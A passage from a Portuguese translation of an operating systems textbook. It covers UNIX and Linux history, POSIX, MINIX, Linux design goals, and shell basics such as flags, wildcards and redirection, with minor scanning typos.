pois havia um trabalho de desenvolvimento a ser feito 
na única máquina UNIX em funcionamento, uma PDP- 
-11, localizada no quinto andar do Bell Labs. O Inter- 
data estava no primeiro andar. Gerar uma nova versão 
significava compilá-la no quinto andar e então carregar 
fisicamente uma fita magnética para o primeiro andar 
para ver se ela funcionava. Após vários meses carre- 
gando fitas, uma pessoa desconhecida disse: “Sabem de 
uma coisa, nós somos a companhia telefônica. Não é 
possível passar um cabo entre essas duas maquinas?”. 
Assim nasceu a rede UNIX. Após a migração para o 
Interdata, o UNIX foi levado para o VAX e mais tarde 
para outros computadores. 

Após a AT&T ter sido dividida em diversas empre- 
sas menores em 1984 pelo governo norte-americano, 
ela estava legalmente livre para estabelecer uma sub- 
sidiária de computadores, e assim o fez. Logo em se- 
guida, a AT&T lançou seu primeiro produto UNIX 
comercial, System III. Ele não foi bem recebido, então 
foi substituído por uma versão melhorada, System V, 
um ano depois. O que aconteceu com o System IV é um 
dos grandes mistérios não solucionados da ciência de 
computação. O System V original foi substituído des- 
de então pelos lançamentos 2, 3 e 4 do System V, cada 
um maior e mais complicado que o seu predecessor. No 
processo, a ideia original por trás do UNIX, de ter um 
sistema simples e elegante, gradualmente perdeu força. 
Embora o grupo de Ritchie e Thompson tenha produzi- 
do mais tarde 8º, 9? e 102 edições do UNIX, essas nunca 
chegaram a ser amplamente distribuídas, uma vez que 
a AT&T havia colocado toda sua potência de marketing 
por trás do System V. No entanto, algumas dessas ideias 
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das novas edições foram eventualmente incorporadas 
no System V. A AT&T decidiu por fim que ela queria 
ser uma companhia telefônica no fim das contas, não 
uma empresa de computadores, e vendeu seu negócio 
UNIX para a Novell em 1993. A Novell subsequente- 
mente vendeu-o para a Operação Santa Cruz em 1995. 
A essa altura era quase irrelevante quem era seu dono, 
pois todas as principais empresas de computadores já 
tinham licenças. 


10.1.4 Berkeley UNIX 


Uma das muitas universidades que adquiriu a Versão 
6 do UNIX no início foi a Universidade da Califórnia, 
em Berkeley. Como todo o código-fonte estava dispo- 
nível, Berkeley foi capaz de modificar o sistema subs- 
tancialmente. Ajudada por financiamentos da ARPA, a 
Agência de Projetos de Pesquisa Avançados do Depar- 
tamento de Defesa norte-americano, Berkeley produziu 
e liberou uma versão melhorada para o PDP-11 chama- 
da 1BSD (First Berkeley Software Distribution — 
Primeira distribuição de software de Berkeley). Essa 
fita foi seguida rapidamente por outra, chamada 2BSD, 
também para o PDP-11. 

Mais importante foi o 3BSD e em especial seu su- 
cessor, 4BSD para o VAX. Embora a AT&T tivesse 
uma versão VAX do UNIX, chamada 32V, ela era 
essencialmente a Versão 7. Em comparação, o 4BSD 
continha um grande número de melhorias. Destaca-se 
entre elas o uso da memória virtual e da paginação, 
permitindo que programas fossem maiores do que a 
memória física ao paginar partes dele para dentro e 
para fora conforme a necessidade. Outra mudança per- 
mitiu que os nomes dos arquivos tivessem mais de 14 
caracteres. A implementação do sistema de arquivos 
também foi modificada, tornando-a consideravelmen- 
te mais rápida. O tratamento de sinais tornou-se mais 
confiável. A rede foi introduzida, fazendo que o proto- 
colo de rede que era usado, TCP/IP, se transformasse 
no padrão de facto no mundo UNIX, e mais tarde na 
internet, que é dominada por servidores baseados no 
UNIX. 

Berkeley também incorporou um número substan- 
cial de programas utilitários para o UNIX, incluindo um 
novo editor (vi), um novo shell (csh), compiladores Pas- 
cal e Lisp, e muito mais. Todas essas melhorias fizeram 
com que a Sun Microsystems, DEC e outros vendedo- 
res de computadores baseassem suas versões do UNIX 
no Berkeley UNIX, em vez de na versão “oficial” da 
AT&T, o System V. Em consequência, o UNIX de 
Berkeley estabeleceu-se bem nos mundos acadêmico, 


de pesquisa e de defesa. Para mais informações sobre o 
UNIX de Berkeley, ver McKusick et al. (1996). 


10.1.5 UNIX padrão 


Ao final da década de 1980, duas versões diferen- 
tes e de certa maneira incompatíveis do UNIX esta- 
vam sendo amplamente usadas: o 4.3BSD e o System 
V Release 3. Além disso, virtualmente cada vendedor 
acrescentava suas próprias melhorias não padronizadas. 
Essa divisão no mundo UNIX, junto com o fato de que 
não havia padrões para formatos de programas binários, 
inibiu muito o sucesso comercial do UNIX, porque era 
impossível para os vendedores de software escrever e 
vender programas UNIX com a expectativa de que eles 
executariam em qualquer sistema UNIX (como era roti- 
neiramente feito com o MS-DOS). Várias tentativas de 
padronização do UNIX falharam inicialmente. A AT&T, 
por exemplo, lançou o SVID (System V Interface De- 
finition — Definição de Interface System V), que defi- 
niu todas as chamadas de sistema, formatos de arquivos 
e assim por diante. Esse documento era uma tentativa de 
manter todos os vendedores System V alinhados, mas 
não teve efeito sobre o campo inimigo (BSD), que ape- 
nas o ignorou. 

A primeira tentativa séria de reconciliar os dois “sa- 
bores” de UNIX foi iniciada sob os auspícios do Conse- 
lho de Padrões IEEE, um corpo altamente respeitado e, 
mais importante, neutro. Centenas de pessoas da indús- 
tria, mundo acadêmico e governo participaram desse 
trabalho. O nome coletivo para esse projeto foi POSIX. 
As primeiras três letras referem-se ao Sistema Opera- 
cional Portátil. O LX foi acrescentado para remeter o 
nome ao UNIX. 

Após muita discussão, argumentos e contra-argu- 
mentos, o comitê POSIX produziu um padrão conhe- 
cido como 1003.1. Ele define um conjunto de rotinas 
de biblioteca que todo sistema em conformidade com 
o UNIX deve fornecer. A maioria dessas rotinas invoca 
uma chamada de sistema, mas poucas podem ser im- 
plementadas fora do núcleo. Rotinas típicas são open, 
read e fork. A ideia do POSIX é de que um vendedor de 
software que escreve um programa que usa apenas roti- 
nas definidas por 1003.1 sabe que esse programa execu- 
tará em cada sistema UNIX em conformidade. 

Embora seja verdade que a maioria dos grupos de 
padronização tende a produzir um compromisso ter- 
rível com algumas características preferidas de todos, 
o 1003.1 é extraordinariamente bom considerando o 
grande número de partes envolvidas em seus receptivos 
interesses investidos. Em vez de tomar a união de todas 


as características no System V e BSD como o ponto 
de partida (a norma para a maioria de todos os grupos 
de padronização), o comitê IEEE tomou a intersecção. 
Grosso modo, se uma característica estivesse presente 
tanto no System V quanto no BSD, ela era incluída no 
padrão; de outra maneira, não o era. Como consequência 
desse algoritmo, 1003.1 traz uma forte semelhança com 
o ancestral comum tanto do System V quanto do BSD, 
a saber a Versão 7. O documento 1003.1 está escrito de 
tal maneira que tanto os implementadores do sistema 
quanto os escritores do software podem compreendê-lo, 
outra novidade no mundo da padronização, embora um 
trabalho esteja a caminho para remediar a situação. 

Embora o padrão 1003.1 aborde somente chamadas 
de sistema, documentos relacionados padronizam threads, 
programas utilitários, redes e muitas outras características 
do UNIX. Além disso, a linguagem C também foi padro- 
nizada pelo ANSI e ISO. 


10.1.6 MINIX 


Uma propriedade que todos os sistemas UNIX têm é 
que eles são grandes e complicados, de certa maneira a 
antítese da ideia original por trás do UNIX. Mesmo que o 
código-fonte estivesse livremente disponível, o que não 
acontece na maioria dos casos, está fora de questão que 
uma única pessoa pudesse compreendê-lo inteiramente. 
Essa situação levou um dos autores deste livro (AST) a 
escrever um novo sistema do tipo UNIX que fosse pe- 
queno o suficiente para ser compreendido, estivesse dis- 
ponível com todo o código-fonte e pudesse ser usado 
para fins educacionais. Esse sistema constituiu em 11800 
linhas de código C e 800 linhas de código de montagem. 
Lançado em 1987, ele era funcionalmente quase equiva- 
lente à Versão 7 do UNIX, o sustentáculo da maioria dos 
departamentos de ciência da computação da era PDP-11. 

O MINIX foi um dos primeiros sistemas do tipo 
UNIX baseados em um projeto de micronúcleo. A ideia 
por trás de um micronúcleo é proporcionar uma fun- 
cionalidade mínima no núcleo para torná-lo confiável e 
eficiente. Em consequência, o gerenciamento de memó- 
ria e o sistema de arquivos foram empurrados para os 
processos de usuário. O núcleo tratava da troca de men- 
sagens entre processos e outras poucas coisas. O núcleo 
tinha 1.600 linhas de C e 800 linhas em linguagem de 
montagem. Por razões técnicas relacionadas à arquite- 
tura 8088, os drivers do dispositivo de E/S (2.900 linhas 
adicionais de C) também estavam no núcleo. O sistema 
de arquivos (5.100 linhas de C) e o gerenciador de me- 
mória (2.200 linhas de C) executavam como dois pro- 
cessos do usuário em separado. 
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Micronúcleos têm a vantagem sobre sistemas mo- 
nolíticos que eles são fáceis de compreender e manter 
devido à sua estrutura altamente modular. Também, mi- 
grar o código do modo núcleo para o modo de usuário 
torna-os altamente confiáveis, pois a quebra de um pro- 
cesso usuário provoca menos danos do que a quebra de 
um componente do modo núcleo. A sua principal des- 
vantagem é um desempenho ligeiramente mais baixo 
devido aos chaveamentos extras entre o modo usuário e 
o modo núcleo. No entanto, o desempenho não é tudo: 
todos os sistemas UNIX modernos executam Windows 
X no modo usuário e simplesmente aceitam a queda no 
desempenho para atingir uma maior modularidade (em 
comparação com o Windows, em que mesmo a interfa- 
ce gráfica do usuário — GUI (Graphical User Inter- 
face) — está no núcleo. Outros projetos de micronucleo 
bem conhecidos dessa era foram o Mach (ACCETTA et 
al., 1986) e Chorus (ROZIER et al., 1988). 

Em poucos meses do seu aparecimento, o MINIX 
tornou-se uma espécie de item cultuado, com seu pró- 
prio grupo de notícias USENET (agora Google), comp. 
os.minix, e mais de 40 mil usuários. Inúmeros usuários 
contribuíram com comandos e outros programas de 
usuário, de maneira que o MINIX tornou-se um empre- 
endimento coletivo por um grande número de usuários 
na internet. Foi um protótipo de outros esforços colabo- 
rativos que vieram mais tarde. Em 1997, a Versão 2.0 do 
MINIX foi lançada e o sistema base, agora incluindo a 
rede, havia crescido para 62.200 linhas de código. 

Em torno de 2004, a direção do desenvolvimento do 
MINIX mudou bruscamente. O foco passou a ser a cons- 
trução de um sistema extremamente confiável e seguro 
que pudesse reparar automaticamente as suas próprias 
falhas e curasse a si mesmo, continuando a funcionar 
corretamente mesmo diante da ativação de repetidos 
defeitos de software. Em consequência, a ideia da mo- 
dularização presente na Versão 1 foi bastante expandida 
no MINIX 3.0. Quase todos os drivers de dispositivos 
foram movidos para o espaço do usuário, com cada dri- 
ver executando como um processo separado. O tama- 
nho do núcleo inteiro caiu abruptamente para menos de 
4 mil linhas de código, algo que um único programador 
poderia facilmente compreender. Mecanismos internos 
foram modificados para incrementar a tolerância a fa- 
lhas de várias maneiras. 

Além disso, mais de 650 programas UNIX popu- 
lares foram levados para o MINIX 3.0, incluindo o X 
Window System (as vezes chamado simplesmente de 
X), vários compiladores (incluindo gcc), software de 
processamento de textos, software de rede, navegado- 
res da web e muito mais. Diferentemente das versões 
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anteriores, que eram fundamentalmente educacionais 
em sua natureza, começando com o MINIX 3.0, o sis- 
tema era bastante utilizável, com o foco deslocando-se 
para uma alta confiabilidade. A meta final: nada de bo- 
tões Reset. 

Uma terceira edição do livro Operating Systems: 
Design and Implementation foi lançada, descrevendo 
o novo sistema, dando seu código-fonte em um apên- 
dice e descrevendo-o em detalhe (TANENBAUM e 
WOODHULL, 2006). O sistema continua a evoluir e 
tem uma comunidade de usuários ativa. Desde então 
ele foi levado para o processador ARM, tornando-o 
disponível para sistemas embutidos. Para mais deta- 
lhes e obter a versão atual gratuitamente, você pode 
visitar <www.minix3.org>. 


10.1.7 Linux 


Durante os primeiros anos do desenvolvimento e dis- 
cussão do MINIX na internet, muitas pessoas solicitaram 
(ou em muitos casos, demandaram) mais e melhores ca- 
racterísticas, para as quais o autor muitas vezes disse “não” 
(a fim de manter o sistema pequeno o suficiente para que 
os estudantes o compreendessem completamente em um 
curso universitário de um semestre). Esse contínuo “não” 
incomodou muitos usuários. Nessa época, o FreeBSD não 
estava disponível ainda, de maneira que não havia uma 
opção. Após alguns anos se passarem dessa maneira, um 
estudante finlandês, Linus Torvalds, decidiu escrever outro 
clone do UNIX, chamado Linux, que seria um sistema de 
produção completo com muitas características que inicial- 
mente faltavam ao MINIX. A primeira versão do Linux, 
0.01, foi lançada em 1991. Ela foi desenvolvida em uma 
máquina MINIX e tomou emprestadas inúmeras ideias do 
MINIX, desde a estrutura da árvore de código fonte ao 
layout do sistema de arquivos. No entanto, tratava-se de 
um projeto monolítico em vez de um projeto de micronú- 
cleo, com todo o sistema operacional no núcleo. O código 
chegou a 9.300 linhas de C e 950 linhas de linguagem de 
montagem, mais ou menos similar à versão MINIX em ta- 
manho e também comparável em funcionalidade. De fato, 
era um MINIX reescrito, o único sistema para o qual Tor- 
valds tinha o código-fonte. 

O Linux cresceu rapidamente em tamanho e desen- 
volveu-se em um clone UNIX de produção completo, à 
medida que a memória virtual, um sistema de arquivos 
mais sofisticado e muitas outras características foram 
acrescentados. Embora originalmente ele tenha sido exe- 
cutado apenas no 386 (e ainda tivesse código de mon- 
tagem 386 embutido no meio de rotinas C), ele foi logo 
levado para outras plataformas e hoje executa em uma 


ampla gama de máquinas, como o UNIX. Uma diferen- 
ça com o UNIX se destaca, no entanto: o Linux faz uso 
de muitas características especiais do compilador gcc e 
precisaria de muito trabalho antes que pudesse compilar 
com um compilador C padrão ANSI. A ideia sem visão 
de que gcc é o único compilador que o mundo verá um 
dia já está se tornando um problema, pois o compilador 
LLVM de fonte aberta da Universidade de Illinois está 
rapidamente ganhando muitas adesões por sua flexibili- 
dade e qualidade de código. Como o LLVM não suporta 
todas as extensões gcc não padronizadas para C, ele não 
pode compilar o núcleo Linux sem uma série de remen- 
dos para o núcleo a fim de substituir o código não ANSI. 

O grande lançamento seguinte do Linux foi a versão 
1.0, lançada em 1994. Ela tinha em torno de 165 mil 
linhas de código e incluía um novo sistema de arquivos, 
arquivos mapeados na memória e rede compatível com 
BSD com soquetes e TCP/IP. Ela também incluía mui- 
tos novos drivers de dispositivos. Várias revisões meno- 
res seguiram-se nos dois anos seguintes. 

A essa altura, o Linux era suficientemente compati- 
vel com o UNIX, de maneira que uma vasta quantidade 
de software UNIX foi levada para o Linux, tornando-o 
muito mais útil do que ele teria sido de outra maneira. 
Além disso, um grande número de pessoas foi atraído 
para o Linux e começou a trabalhar no código e a es- 
tendê-lo de muitas maneiras sob a supervisão geral de 
Torvalds. 

O próximo lançamento importante, 2.0, foi feito em 
1996. Ele consistia de aproximadamente 470 mil linhas 
de C e 8 mil linhas de código de montagem. Ele in- 
cluia suporte para arquiteturas de 64 bits, multiprogra- 
mação simétrica, novos protocolos de rede e inúmeras 
outras características. Uma grande parte de código to- 
tal foi tomada por uma coleção extensa de drivers de 
dispositivos para um conjunto sempre maior de perifé- 
ricos suportados. Lançamentos adicionais seguiam-se 
frequentemente. 

As identificações de versões do núcleo Linux con- 
sistiam de quatro números, 4.B.C.D, como 2.6.9.11. O 
primeiro número denota a versão do núcleo; segundo, 
denota a importante revisão. Antes do núcleo 2.6, nú- 
meros de revisão pares correspondiam a lançamentos de 
núcleos estáveis, enquanto números ímpares correspon- 
diam a revisões instáveis, sob desenvolvimento. Com 
o núcleo 2.6 esse não é mais o caso. O terceiro número 
corresponde a revisões menores, como suporte a novos 
drivers. O quarto número corresponde a consertos de 
defeitos menores ou soluções (patches) de segurança. 
Em julho de 2011, Linus Torvalds anunciou o lança- 
mento do Linux 3.0, não em resposta a avanços técnicos 


importantes, mas com o intuito de honrar o 20º aniver- 
sário do núcleo. Em 2013, o núcleo do Linux consistia 
de cerca de 16 milhões de linhas de código. 

Um conjunto considerável de softwares UNIX pa- 
drão foi levado para o Linux, incluindo o popular X 
Window System e uma quantidade significativa de 
softwares de rede. Dois GUIs diferentes (GNOME e 
KDE), que competem um com o outro, também foram 
escritos para o Linux. Resumindo, ele tornou-se um 
grande clone do UNIX com todos os apetrechos que um 
apaixonado por UNIX pudesse querer. 

Uma característica incomum do Linux é o modelo de 
negócios: ele é um software livre. Pode ser baixado de 
vários sites na internet, por exemplo: <www.kernel.org>. 
O Linux vem com uma licença escrita por Richard Stall- 
man, fundador da Free Software Foundation (Fundação 
de Software Livre). Apesar de o Linux ser livre, essa li- 
cença, a GPL (GNU Public License — Licença Pública 
GNU), é mais longa que a licença do Windows da Micro- 
soft e especifica o que você pode e não pode fazer com o 
código. Usuários podem usar, copiar, modificar e redis- 
tribuir a fonte e o código binário livremente. A principal 
restrição é que todos os trabalhos derivados do núcleo 
do Linux não sejam vendidos ou redistribuídos somente 
na forma binária; o código-fonte deve ser enviado com o 
produto ou disponibilizado conforme a solicitação. 

Embora Torvalds ainda controle o núcleo de manei- 
ra bastante próxima, uma grande quantidade de soft- 
ware em nível de usuário foi escrita por uma série de 
outros programadores, muitos deles tendo migrado das 
comunidades on-line MINIX, BSD e GNU. No entan- 
to, à medida que o Linux se desenvolve, uma fração 
cada vez menor da comunidade Linux quer desenvol- 
ver códigos-fonte (vide as centenas de livros dizendo 
como instalar e usar o Linux e apenas um punhado 
discutindo o código e como ele funciona). Também, 
muitos usuários do Linux hoje em dia abrem mão da 
distribuição gratuita na internet para comprar uma das 
muitas distribuições em CD-ROM disponíveis de di- 
versas empresas comerciais competindo entre si. Um 
site popular listando as atuais top-100 distribuições 
de Linux está em <wwu.distrowatch.org>. A medida 
que mais e mais companhias de software começam a 
vender suas próprias versões de Linux e mais e mais 
companhias de hardware se oferecem para fazer sua 
pré-instalação nos computadores que elas enviam, a 
linha entre o software comercial e o software livre está 
começando a se confundir substancialmente. 

Como uma nota para a história do Linux, é interes- 
sante observar que justo quando o Linux ganhava tração, 
ele ganhou um empurrão e tanto de uma fonte muito 
inesperada — AT&T. Em 1992, Berkeley, a essa altura 
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com problemas de financiamento, decidiu encerrar o 
desenvolvimento do BSD com um último lançamento, 
4.4BSD (que mais tarde formou a base do FreeBSD). 
Como essa versão não continha essencialmente nenhum 
código AT&T, Berkeley lançou o software sob uma li- 
cença de fonte aberta (não GPL) que deixava qualquer 
um fazer o que quisesse, exceto uma coisa: processar a 
Universidade da Califórnia. A subsidiária AT&T con- 
trolando o UNIX prontamente reagiu — você adivi- 
nhou — processando a Universidade da Califórnia. Ela 
também processou uma empresa, BSDI, estabelecida 
pelos criadores do BSD para fazer um pacote do sis- 
tema e vender suporte, como a Red Hat e outras em- 
presas fazem hoje em dia para o Linux. Tendo em vista 
que virtualmente nenhum código AT&T foi envolvido, 
o processo judicial foi baseado em infrações ao direito 
autoral e marca registrada, incluindo itens como o nú- 
mero de telefone 1-800-ITS-UNIX da BSDI. Embora o 
caso tenha sido por fim resolvido longe dos tribunais, 
ele manteve o FreeBSD fora do mercado por tempo su- 
ficiente para que o Linux se estabelecesse bem. Se o 
processo não tivesse ocorrido, começando em torno de 
1993 teria havido uma competição séria entre dois sis- 
temas UNIX livres e de fonte aberta: o atual campeão, 
BSD, um sistema maduro e estável com uma grande 
quantidade de seguidores no mundo acadêmico desde 
1977, contra o vigoroso jovem desafiador, Linux, com 
apenas dois anos de idade, mas com um número cres- 
cente de seguidores entre os usuários individuais. Quem 
sabe como essa batalha de UNIX livres teria terminado? 


10.2 Visão geral do Linux 


Nesta seção, forneceremos uma introdução geral ao 
Linux e como é usado, em prol dos leitores que ainda 
não estão familiarizados com ele. Quase todo esse ma- 
terial aplica-se a aproximadamente todas as variantes 
do UNIX com apenas pequenas variações. Embora o 
Linux tenha diversas interfaces gráficas, o foco aqui é 
em como ele aparece para um programador trabalhan- 
do em uma janela shell em X. Seções subsequentes se 
concentrarão em chamadas de sistema e como elas fun- 
cionam por dentro. 


10.2.1 Objetivos do Linux 


O UNIX sempre foi um sistema interativo projetado 
para lidar com múltiplos processos e múltiplos usuários 
ao mesmo tempo. Ele foi projetado por programadores, 
para programadores, para ser usado em um ambiente no 
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qual a maioria dos usuários é relativamente sofisticada 
e está engajada em projetos de desenvolvimento de soft- 
wares (muitas vezes bastante complexos). Em muitos 
casos, um grande número de programadores está ati- 
vamente cooperando para produzir um único sistema, 
de maneira que o UNIX tem amplos recursos para per- 
mitir que as pessoas trabalhem juntas e compartilhem 
informações de maneiras controladas. O modelo de um 
grupo de programadores experientes trabalhando juntos 
e próximos para produzir softwares avançados é obvia- 
mente muito diferente do modelo de um computador 
pessoal de um único iniciante trabalhando sozinho com 
um editor de texto, e essa diferença é refletida por meio 
do UNIX do início ao fim. É apenas natural que o Linux 
tenha herdado muitos desses objetivos, embora a pri- 
meira versão tenha sido para um computador pessoal. 

O que programadores bons realmente querem em 
um sistema? Para começo de conversa, a maioria gosta 
que seus sistemas sejam simples, elegantes e consisten- 
tes. Por exemplo, no nível mais baixo, um arquivo deve 
ser uma coleção de bytes. Ter diferentes classes de ar- 
quivos para acesso sequencial, acesso aleatório, acesso 
por chaves, acesso remoto e assim por diante (como os 
computadores de grande porte têm) é apenas um estor- 
vo. De modo similar, se o comando for 


Is A* 


significa listar todos os arquivos começando com “A”, 
então o comando 


rm A* 


deve significar remover todos os arquivos começando 
com “A” e não remover o arquivo cujo nome consiste 
em um “A” e um asterisco. Essa característica às vezes 
é chamada de princípio da menor surpresa. 

Outra coisa que programadores experientes geral- 
mente querem é poder e flexibilidade. Isso significa que 
um sistema deve ter um pequeno número de elementos 
básicos que possam ser combinados de infinitas manei- 
ras para servir à aplicação. Uma das diretrizes básicas 
por trás do Linux é que todo programa deve fazer ape- 
nas uma coisa, e fazer bem. Desse modo, compiladores 
não produzem listagens, pois outros programas podem 
fazê-lo melhor. 

Por fim, a maioria dos programadores detesta a redun- 
dância inútil. Por que digitar copy quando cp é sem dúvi- 
da o suficiente para deixar muito claro o que você quer? 
Trata-se de um desperdício completo de tempo de desen- 
volvimento. Para extrair todas as linhas contendo a cadeia 
“ard” do arquivo f, o programador Linux meramente digita 


grep ard f 


A abordagem oposta é o programador primeiro sele- 
cionar o programa grep (sem argumentos), e então grep 
anunciar a si mesmo dizendo: “Olá, sou grep, procu- 
ro por padrões em arquivos. Por favor, insira o seu pa- 
drão”. Após conseguir o padrão, grep espera pelo nome 
do arquivo. Então ele pergunta se existem mais nomes 
de arquivos. Por fim, ele resume o que vai fazer e per- 
gunta se está correto. Embora esse tipo de interface do 
usuário possa ser adequado para novatos, ele deixa pro- 
gramadores experientes malucos. O que eles querem é 
um servidor, não uma babá. 


10.2.2 Interfaces para o Linux 


Um sistema Linux pode ser considerado um tipo de 
pirâmide, como ilustrado na Figura 10.1. Na parte de 
baixo está o hardware, consistindo na CPU, memória, 
discos, um monitor e um teclado e outros dispositivos. 
A sua função é controlar o hardware e fornecer uma in- 
terface de chamada de sistema para todos os programas. 
Essas chamadas de sistema permitem que os programas 
do usuário criem e gerenciem processos, arquivos e ou- 
tros recursos. 

Programas fazem chamadas de sistema colocando os 
argumentos em registradores (ou às vezes, na pilha), e 
emitindo instruções de desvio para chavear do modo usu- 
ário para o modo núcleo. Dado que não há como escrever 
uma instrução de desvio em C, é fornecida uma bibliote- 
ca, com uma rotina por chamada de sistema. Essas roti- 
nas são escritas em linguagem de montagem, mas podem 
ser chamadas a partir de C. Cada uma coloca primeiro 
seus argumentos no lugar apropriado, então executa a 
instrução de desvio. Assim, para executar a chamada de 
sistema read, um programa C pode chamar a rotina de bi- 
blioteca read. Como uma nota, é a interface de biblioteca, 
e não a interface de chamada do sistema, que está especi- 
ficada pelo POSIX. Em outras palavras, POSIX nos diz 
quais rotinas de biblioteca um sistema em conformidade 
deve fornecer, quais são seus parâmetros, o que devem 
fazer, quais resultados devem retornar. Ele nem chega a 
mencionar as chamadas de sistema reais. 

Além do sistema operacional e da biblioteca de 
chamadas de sistemas, todas as versões do Linux for- 
necem um grande número de programas padrão, al- 
guns dos quais são especificados pelo padrão POSIX 
1003.2, e alguns dos quais diferem entre as versões 
Linux. Entre eles estão o processador de comandos 
(shell), compiladores, editores, programas de edição 
de texto e utilitários de manipulação de arquivos. São 
esses programas que um usuário no teclado invoca. 
Então, podemos falar de três interfaces diferentes para 


[FIGURA 10.1] As camadas em um sistema Linux. 
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o Linux: a verdadeira interface de chamada de sistema, 
a de biblioteca e a interface formada pelo conjunto de 
programas utilitários padrão. 

A maioria das distribuições de computadores pesso- 
ais comuns do Linux substituiu essa interface de usuário 
orientada pelo teclado por uma interface de usuário grá- 
fica orientada pelo mouse, sem mudar em nada o sistema 
operacional em si. É precisamente essa flexibilidade que 
tornou o Linux tão popular e permitiu que ele sobrevivesse 
tão bem a inúmeras mudanças na tecnologia subjacente. 

A GUI para o Linux é similar às primeiras GUIs de- 
senvolvidas para sistemas UNIX nos anos de 1970 e po- 
pularizadas pelo Macintosh e mais tarde Windows para 
plataformas de PCs. A GUI cria um ambiente de área 
de trabalho, uma metáfora familiar com janelas, ícones, 
pastas, barras de ferramentas e funcionalidades de ar- 
rastar e largar. Um ambiente de área de trabalho com- 
pleto contém um gerenciador de janelas, que controla 
a colocação e o aparecimento de janelas, assim como 
várias aplicações, e fornece uma interface gráfica con- 
sistente. Ambientes de área de trabalho populares para o 
Linux incluem GNOME (GNU Network Object Model 
Environment) e KDE (K Desktop Environment). 

GUIs no Linux têm o suporte do Sistema X Window, 
que define os protocolos de comunicação e exibição 
para manipular janelas em exibições de bitmaps para 
o UNIX e sistemas do tipo UNIX. O servidor X é o 
principal componente que controla dispositivos como 
o teclado, o mouse e a tela, e é responsável por redire- 
cionar a entrada para ou aceitar a saída de programas 
clientes. O ambiente GUI real geralmente é construi- 
do sobre uma biblioteca de baixo nivel, x/ib, que con- 
tém a funcionalidade para interagir com o servidor X. 
A interface gráfica estende a funcionalidade básica do 


X11 enriquecendo a visão da janela, fornecendo botões, 
menus, ícones e outras opções. O servidor X pode ser 
inicializado manualmente, a partir de uma linha de co- 
mando, mas geralmente é inicializado durante o proces- 
so de inicialização por meio de um gerenciador de tela, 
que exibe a tela de login gráfica para o usuário. 

Quando trabalhando em sistemas Linux por meio de 
uma interface gráfica, os usuários podem usar cliques 
do mouse para executar aplicações ou abrir arquivos, 
arrastar e largar para copiar arquivos de uma localiza- 
ção para outra, e assim por diante. Além disso, os usu- 
ários podem invocar um programa emulador terminal, 
ou xterm, que lhes proporciona a interface de linha de 
comando básica para o sistema operacional. A sua des- 
crição é dada na seção a seguir. 


10.2.3 O interpretador de comandos (shell) 


Embora os sistemas Linux tenham uma interface de 
usuário gráfica, a maioria dos programadores e usuá- 
rios gráficos ainda prefere uma interface de linha de co- 
mando, chamada de interpretador de comandos (shell). 
Muitas vezes eles abrem uma ou mais janelas de shell 
da interface de usuário gráfica e apenas trabalham nelas. 
A interface de linha de comando shell é muito mais rápi- 
da de ser usada, mais poderosa, facilmente extensível e 
não causa nenhuma lesão por esforço repetitivo (LER) 
por usar o mouse o tempo todo. A seguir descreveremos 
brevemente o shell bash. Ele é bastante inspirado no 
shell UNIX original, o shell Bourne (escrito por Steve 
Bourne, então no Bell Labs). Seu nome é um acrônimo 
para Bourne Again SHell. Muitos outros shells também 
estão em uso (ksh, csh etc.), mas bash é o shell padrão 
na maioria dos sistemas Linux. 
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Quando acionado, o shell inicializa a si mesmo, 
então digita um caractere prompt, muitas vezes uma 
percentagem ou sinal de dólar, na tela e espera que o 
usuário digite uma linha de comando. 

Quando o usuário digita uma linha de comando, o 
shell extrai a primeira palavra dele, onde palavra aqui 
significa uma série de caracteres delimitados por um es- 
paço ou guia (tab). Ele então presume que essa palavra 
é o nome de um programa a ser executado, pesquisa por 
esse programa e se o encontra, executa-o. O shell então 
suspende a si mesmo até o programa terminar, momento 
em que ele tenta ler o próximo comando. O que é impor- 
tante aqui é simplesmente a observação de que o shell é 
um programa de usuário comum. Tudo de que ele precisa 
é a capacidade de ler do teclado e escrever para o moni- 
tor, assim como o poder de executar outros programas. 

Comandos podem aceitar argumentos, que são pas- 
sados como cadeias de caracteres para o programa cha- 
mado. Por exemplo, a linha de comando 


cp src dest 


invoca o programa cp com dois argumentos, src e dest. 
Esse programa interpreta o primeiro para ser o nome de 
um arquivo existente. Ele faz uma cópia desse arquivo 
e chama a cópia dest. 

Nem todos argumentos são nomes de arquivos. Em 


head —20 file 


o primeiro argumento, —20, diz para head imprimir as 
primeiras 20 linhas de file, em vez do número padrão 
de linhas, 10. Argumentos que controlam a operação 
de um comando ou especificam um valor opcional são 
chamados de flags, e por convenção são indicados por 
um traço. O traço é necessário para evitar ambiguidade, 
pois o comando 


head 20 file 


é perfeitamente legal, e diz a head para primeiro im- 
primir 10 linhas de um arquivo chamado 20 e então 
imprimir as 10 linhas iniciais de um segundo arquivo 
chamado file. A maioria dos computadores Linux aceita 
múltiplos flags e argumentos. 

Para facilitar especificar múltiplos nomes de arqui- 
vos, o shell aceita caracteres mágicos, às vezes chama- 
dos de caracteres curinga. Um asterisco, por exemplo, 
casa com todas as cadeias possíveis, então 


* 


Is *.c 


diz a /s para listar todos os arquivos cujo nome termina 
em .c. Se os arquivos chamados x.c, y.c e z.c existirem, 
o comando acima será o equivalente a digitar 


Is X.C y.C Z.C 


Outro caractere curinga é o ponto de interrogação, 
que corresponde a qualquer caractere. Uma lista de ca- 
racteres dentro de colchetes seleciona qualquer um de- 
les, então 


Is [ape]* 


66,99 66,199 66499 


lista todos os arquivos começando com “a”, “p”, ou “e”, 

Um programa como o shell não precisa abrir o termi- 
nal (teclado e monitor) a fim de ler a partir dele ou es- 
crever para ele. Em vez disso, quando ele (ou qualquer 
outro programa) é inicializado, ele automaticamente 
tem acesso a um arquivo chamado entrada padrão 
(para leitura), um arquivo chamado saída padrão (para 
escrita normal) e um arquivo chamado erro padrão 
(para escrever mensagens de erro). Em geral, todos os 
três arquivos são padrões para o terminal, de maneira 
que leituras da entrada padrão vêm do teclado e escritas 
da saída padrão ou erro padrão vão para a tela. Muitos 
programas Linux leem da entrada padrão e escrevem 
para a saída padrão sem a necessidade de que isso seja 
especificado. Por exemplo, 


sort 


invoca o programa sort, que lê linhas do terminal (até o 
usuário digitar um CTRL-D, para indicar o fim do ar- 
quivo), ordena-as alfabeticamente e escreve o resultado 
para a tela. 

Também é possível se redirecionar a entrada padrão 
e a saída padrão, à medida que isso é muitas vezes útil. 
A sintaxe para redirecionar entradas padrão usa um sim- 
bolo menor que (<) seguido pelo nome de arquivo de 
entrada. De modo semelhante, a saída padrão é redire- 
cionada usando um símbolo maior que (>). É permitido 
